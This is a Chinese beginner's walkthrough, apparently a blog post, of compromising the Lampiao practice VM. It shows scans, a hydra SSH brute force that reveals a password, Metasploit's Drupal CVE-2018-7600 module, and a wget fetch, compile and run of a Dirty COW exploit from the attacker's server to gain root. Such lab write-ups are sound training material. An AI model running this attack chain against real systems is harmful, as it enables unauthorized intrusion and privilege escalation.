零基础渗透测试全程记录（打靶）——Lampiao

深碍√TFBOYSˉ_ 2023-10-14 08:07 11阅读 0赞

# 一、打靶总流程 #

## 1.确定目标： ##

在本靶场中，确定目标就是使用nmap进行ip扫描，确定ip即为目标，只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描，但不局限于这个nmap。

## 2.信息收集： ##

比如平常挖洞使用fofa，天眼查，ip域名等进行查，在我们这个靶场中比如信息收集包括查看源码，使用工具dirb等。

## 3.发现漏洞： ##

那些理论比如sql注入，文件上传等，或者找到相关的系统信息，去网上找相关的exp这些都是为了拿到webshell。

## 4.漏洞利用： ##

漏洞利用就是使用漏洞拿到webshell。

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。

## 5.权限提升： ##

权限提升，就是所谓的提权，因为一般进入拿到webshell后进入到服务器了都是低权限，在接下来的靶中我们的目标都是拿到root权限，所以拿到webshell后是低权限用户，这个时候我们需要一系列的方式进行提权，最后拿到root权限，即为结束。

# 二、打靶实例详解 #

--------------------

###### 文章内的靶机及脚本关注后私信获取 ######

--------------------

### 1.首先将靶机以及kali启动。 ###

![b6d21b23d4c34ddcbe857637e05da0a3.png][]

### 2.注意将两者的网络适配器均调整为NAT模式（确保二者是在同一个网段下）。 ###

![d785567f2c25477d912ee8ff13b41082.png][]

### 3.从kali中打开终端，执行ip a命令查看kali的ip地址。 ###

![26a4ac7217e244629606bf60a8dea558.png][]

### 4.使用nmap工具来确认要打的靶机的ip地址。 ###

nmap -sP 192.168.190.0/24

![8fecfb0b97ad4a5d87e7fb8540e71ac0.png][]

**在上面扫描出的ip地址中，.1、.2、.254、.138都是其它的一些ip地址，所以在此确认要进行攻击的靶机的ip地址为：192.168.190.140。**

### 5.接下来继续进行信息收集，信息收集的方面以及方式有很多，这里信息收集是针对此靶机的信息收集。 ###

### 6.扫描靶机开放了哪些端口。 ###

nmap -p- 192.168.190.140

![2410c7c2291d49258b813362fd08957e.png][]

可以看到此靶机开放了22、80、1898端口。其中：开放了22端口ssh，可以想到对其进行爆破，然后通过命令行模式远程连接系统服务器；开放了80端口http，说明可以通过浏览器访问到其地址，可以对其进行常见漏洞测试；开放了1898端口，可以联想到访问web端时将其默认的80端口修改为1898进行访问 。

### 7.首先对80端口进行查看，发现并没有什么有价值的信息。 ###

![414f83cbcd254306b71c5d67da2eb71e.png][]

### 8. 查看页面的源码，发现也没有有价值的信息。 ###

![14bc93969bc54a8192a99e36d45c89f3.png][]

### 9. 想到1898端口，对其进行访问，发现其是一个网页。 ###

![ca2ba0948ad144c1902479c92e30338d.png][]

**来到这个网页，可以想到查看源代码、sql注入、扫目录等操作。**

### 10.点击网页内的图片发现访问了一个新的地址，其url内出现了参数。 ###

![f39c88ccf41244d2aabb498be40248b9.png][]

### 11.看到了参数就想到将其进行修改查看是否有其它有价值的页面。 ###

### 12.当将其修改为2后，可以看到新的网页内存在一个地址，对其进行访问后发现是一段录音，其告诉了我们一个用户名——tiago。 ###

![57761d3049124718b9591aa03ebd4aff.png][]

### 13.继续尝试将其修改为3后发现没有什么可用信息。 ###

![54839266d7914819bc7fed2bf4dac524.png][]

### 14.将其修改为4后发现找不到页面了，所以至此就没有继续修改下去的价值了。 ###

![11f860d99eef4e6c8ed258862ce79195.png][]

### 15. 至此又想到扫描这个站点的目录，因为开发人员在开发网站时可能会遗留一些关键性的文件，这些文件内可能存储一些非常重要的信息。 ###

### 16.使用dirb工具对网站目录进行扫描。 ###

dirb http://192.168.190.140:1898/

![29f3e6f1646e4b08b4b218f37a7a4d46.png][]

### 17.在扫描出的文件中，我们优先访问robots.txt文件，因为一般来说，robots.txt里面放的是一些不希望被搜索引擎的网络爬虫爬取到并收录的内容，因此就更有可能是我们需要的文件。 ###

![4ce095d4d76c4c9da2126b0dafd87e14.png][]

### 18. 依次访问标记为Disallow的文件，当访问到CHANGELOG.txt文件的时候可以看到下面的内容，可以在返回的内容中看到版本信息——Drupal 7.54, 2017-02-01。 ###

![42668de2415541c5a938b1a0647101fd.png][]

### 19.至此，经过信息收集，我们获取到了下面两个信息： ###

*  **用户名：tiago**
 *  **版本：Drupal 7.54, 2017-02-01**

**因此至此有了两条思路：**

*  **利用已知用户名进行爆破**
 *  **利用已知的版本信息去网上搜索exp**

### 20.首先来尝试第一条思路，使用工具进行爆破。 ###

### 21.爆破之前需要使用cewl工具生成一个密码字典。 ###

cewl http://192.168.190.140:1898/ -w password.txt

![e44efa6640c548c6913376f02a722d3c.png][]

![748e0dc3565341f596e955bece0fa621.png][]

### ![54b9b8a15a7a4e4eae849b72c61e1457.png][] ###

### 22.接下来使用hydra工具来进行爆破，爆破之后成功得到了用户名所对应的密码——Virgulino。 ###

hydra -l tiago -P password.txt 192.168.190.140 ssh

![1485710fc5d3459b82587fe78f734980.png][]

### 23.用爆破获得的密码成功登录。 ###

ssh tiago@192.168.190.140

### ![2886ff3db05e48fc847c4115d50cd0d0.png][] ###

### 24.但是发现此时用户的权限是低权限，因此还要对用户进行提权。 ###

*  **id为0 ——root用户**
 *  **0 < id < 1000 ——服务用户： 为服务提供权限** 
 *  **1000 <= id <=60000 ——普通用户**

![2ad849e1d7a641b9bb31c58bd7a37ee9.png][]

### 25.接下来尝试第二种思路，网上查找对应版本的漏洞。 ###

### 26.通过搜索查找到了一个远程代码执行漏洞（靶机的版本在漏洞的影响范围内）——CVE-2018-7600。 ###

![bc20b05eccf24929b77bde2d8f190db6.png][]

### 27.接下来使用msfconsole工具来搜索对应的漏洞并进行漏洞利用。 ###

msfconsole

### ![e1c3494c27ab4b42873c82894e47c4ae.png][] ###

### 28.搜索对应版本，成功搜索出了8个exp。 ###

search Drupal

![c43568eef99c46f88509286698106038.png][]

### 29.因为刚刚搜索到的漏洞是CVE-2018-7600，所以我们选择利用2018年的漏洞，也就是编号为1的exp。 ###

![0e4420030e1c41b4bd14f6bf5d67b318.png][]

### 30.查看需要进行配置的参数。 ###

show options

### ![5de261226e6b4c748ef563f67d480e90.png][] ###

### 31.进行参数配置。 ###

set rhosts 192.168.190.140

set rport 1898

![623bf6d280c74b2282c1406285e4402d.png][]

### 32.执行run命令后，成功连接到了靶机。 ###

run

![851cdeb829234bbebc87e8b13e07fd11.png][]

### 33.执行shell命令实现交互。 ###

![908728b374764750a4f55e895c9aa9f5.png][]

### 34.发现进入的是一个伪终端，因此还要将其转换为真终端，执行下面的命令就将其变成了真终端。 ###

python -c 'import pty; pty.spawn("/bin/bash")'

### ![88f92acb3ea14a88815f1f4ede1ac4a8.png][] ###

### 35. 发现此时用户的权限是低权限，因此还要对用户进行提权。 ###

![dbc1abcd0d9d4ee588610138bcbb9633.png][]

### 36.下面进行提权。 ###

**下面是linux提权的几种方式：**

*  **内核提权：脏牛提权最为典型 ，内核提权一般包括3个步骤，信息收集发现版本号，找到相关版本的exp，使用找到的exp对目标发起攻击，完成提权功能。**
 *  **利用suid提权** 
 *  **利用sudo提权**
 *  **mfs提权**
 *  **mysql提权：包括udf mof提权方式**

### 37.首先查看系统版本。 ###

uname -a

![efda60addde740c5aff26b9c1a5902c8.png][]

### 38.通过搜索，发现此版本可以使用**脏牛提权。** ###

![28c53dd3b27e46ada1e516ac77729bb1.png][]

### 39.搜索exp。 ###

searchsploit dirty

![d6d2eb1f99fa4879b30ac59ba813c1af.png][]

### 40.将要使用的exp下载到本地。 ###

locate linux/local/40847.cpp

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/桌面

### ![99b01bc01e6840ab886e374baecafd2c.png][] ###

![52184d3e8ec8495890a92018f137b215.png][]

### 41.再从本地开启web服务。 ###

python3 -m http.server 8083

![1934dd6e33fb4fafaa4d32233752284c.png][]

### 42. 将exp下载到靶机，然后将其进行编译并执行。 ###

cd /tmp

wget http://192.168.190.138:8083/40847.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil

./yc

![ffcf66489cb54bda984a50ed600936b7.png][]

### 43.切换到root用户，此时即为root权限。 ###

su root

dirtyCowFun

![36fa7e6e7ad44c2db20b052c677b7c71.png][]

### 43.寻找flag。 ###

![a6b39fb6862b41fca0407d3ff4e3d104.png][]

### 44.至此我们就成功拿下了靶机！！！ ###

[b6d21b23d4c34ddcbe857637e05da0a3.png]: https://img-blog.csdnimg.cn/b6d21b23d4c34ddcbe857637e05da0a3.png
[d785567f2c25477d912ee8ff13b41082.png]: https://img-blog.csdnimg.cn/d785567f2c25477d912ee8ff13b41082.png
[26a4ac7217e244629606bf60a8dea558.png]: https://img-blog.csdnimg.cn/26a4ac7217e244629606bf60a8dea558.png
[8fecfb0b97ad4a5d87e7fb8540e71ac0.png]: https://img-blog.csdnimg.cn/8fecfb0b97ad4a5d87e7fb8540e71ac0.png
[2410c7c2291d49258b813362fd08957e.png]: https://img-blog.csdnimg.cn/2410c7c2291d49258b813362fd08957e.png
[414f83cbcd254306b71c5d67da2eb71e.png]: https://img-blog.csdnimg.cn/414f83cbcd254306b71c5d67da2eb71e.png
[14bc93969bc54a8192a99e36d45c89f3.png]: https://img-blog.csdnimg.cn/14bc93969bc54a8192a99e36d45c89f3.png
[ca2ba0948ad144c1902479c92e30338d.png]: https://img-blog.csdnimg.cn/ca2ba0948ad144c1902479c92e30338d.png
[f39c88ccf41244d2aabb498be40248b9.png]: https://img-blog.csdnimg.cn/f39c88ccf41244d2aabb498be40248b9.png
[57761d3049124718b9591aa03ebd4aff.png]: https://img-blog.csdnimg.cn/57761d3049124718b9591aa03ebd4aff.png
[54839266d7914819bc7fed2bf4dac524.png]: https://img-blog.csdnimg.cn/54839266d7914819bc7fed2bf4dac524.png
[11f860d99eef4e6c8ed258862ce79195.png]: https://img-blog.csdnimg.cn/11f860d99eef4e6c8ed258862ce79195.png
[29f3e6f1646e4b08b4b218f37a7a4d46.png]: https://img-blog.csdnimg.cn/29f3e6f1646e4b08b4b218f37a7a4d46.png
[4ce095d4d76c4c9da2126b0dafd87e14.png]: https://img-blog.csdnimg.cn/4ce095d4d76c4c9da2126b0dafd87e14.png
[42668de2415541c5a938b1a0647101fd.png]: https://img-blog.csdnimg.cn/42668de2415541c5a938b1a0647101fd.png
[e44efa6640c548c6913376f02a722d3c.png]: https://img-blog.csdnimg.cn/e44efa6640c548c6913376f02a722d3c.png
[748e0dc3565341f596e955bece0fa621.png]: https://img-blog.csdnimg.cn/748e0dc3565341f596e955bece0fa621.png
[54b9b8a15a7a4e4eae849b72c61e1457.png]: https://img-blog.csdnimg.cn/54b9b8a15a7a4e4eae849b72c61e1457.png
[1485710fc5d3459b82587fe78f734980.png]: https://img-blog.csdnimg.cn/1485710fc5d3459b82587fe78f734980.png
[2886ff3db05e48fc847c4115d50cd0d0.png]: https://img-blog.csdnimg.cn/2886ff3db05e48fc847c4115d50cd0d0.png
[2ad849e1d7a641b9bb31c58bd7a37ee9.png]: https://img-blog.csdnimg.cn/2ad849e1d7a641b9bb31c58bd7a37ee9.png
[bc20b05eccf24929b77bde2d8f190db6.png]: https://img-blog.csdnimg.cn/bc20b05eccf24929b77bde2d8f190db6.png
[e1c3494c27ab4b42873c82894e47c4ae.png]: https://img-blog.csdnimg.cn/e1c3494c27ab4b42873c82894e47c4ae.png
[c43568eef99c46f88509286698106038.png]: https://img-blog.csdnimg.cn/c43568eef99c46f88509286698106038.png
[0e4420030e1c41b4bd14f6bf5d67b318.png]: https://img-blog.csdnimg.cn/0e4420030e1c41b4bd14f6bf5d67b318.png
[5de261226e6b4c748ef563f67d480e90.png]: https://img-blog.csdnimg.cn/5de261226e6b4c748ef563f67d480e90.png
[623bf6d280c74b2282c1406285e4402d.png]: https://img-blog.csdnimg.cn/623bf6d280c74b2282c1406285e4402d.png
[851cdeb829234bbebc87e8b13e07fd11.png]: https://img-blog.csdnimg.cn/851cdeb829234bbebc87e8b13e07fd11.png
[908728b374764750a4f55e895c9aa9f5.png]: https://img-blog.csdnimg.cn/908728b374764750a4f55e895c9aa9f5.png
[88f92acb3ea14a88815f1f4ede1ac4a8.png]: https://img-blog.csdnimg.cn/88f92acb3ea14a88815f1f4ede1ac4a8.png
[dbc1abcd0d9d4ee588610138bcbb9633.png]: https://img-blog.csdnimg.cn/dbc1abcd0d9d4ee588610138bcbb9633.png
[efda60addde740c5aff26b9c1a5902c8.png]: https://img-blog.csdnimg.cn/efda60addde740c5aff26b9c1a5902c8.png
[28c53dd3b27e46ada1e516ac77729bb1.png]: https://img-blog.csdnimg.cn/28c53dd3b27e46ada1e516ac77729bb1.png
[d6d2eb1f99fa4879b30ac59ba813c1af.png]: https://img-blog.csdnimg.cn/d6d2eb1f99fa4879b30ac59ba813c1af.png
[99b01bc01e6840ab886e374baecafd2c.png]: https://img-blog.csdnimg.cn/99b01bc01e6840ab886e374baecafd2c.png
[52184d3e8ec8495890a92018f137b215.png]: https://img-blog.csdnimg.cn/52184d3e8ec8495890a92018f137b215.png
[1934dd6e33fb4fafaa4d32233752284c.png]: https://img-blog.csdnimg.cn/1934dd6e33fb4fafaa4d32233752284c.png
[ffcf66489cb54bda984a50ed600936b7.png]: https://img-blog.csdnimg.cn/ffcf66489cb54bda984a50ed600936b7.png
[36fa7e6e7ad44c2db20b052c677b7c71.png]: https://img-blog.csdnimg.cn/36fa7e6e7ad44c2db20b052c677b7c71.png
[a6b39fb6862b41fca0407d3ff4e3d104.png]: https://img-blog.csdnimg.cn/a6b39fb6862b41fca0407d3ff4e3d104.png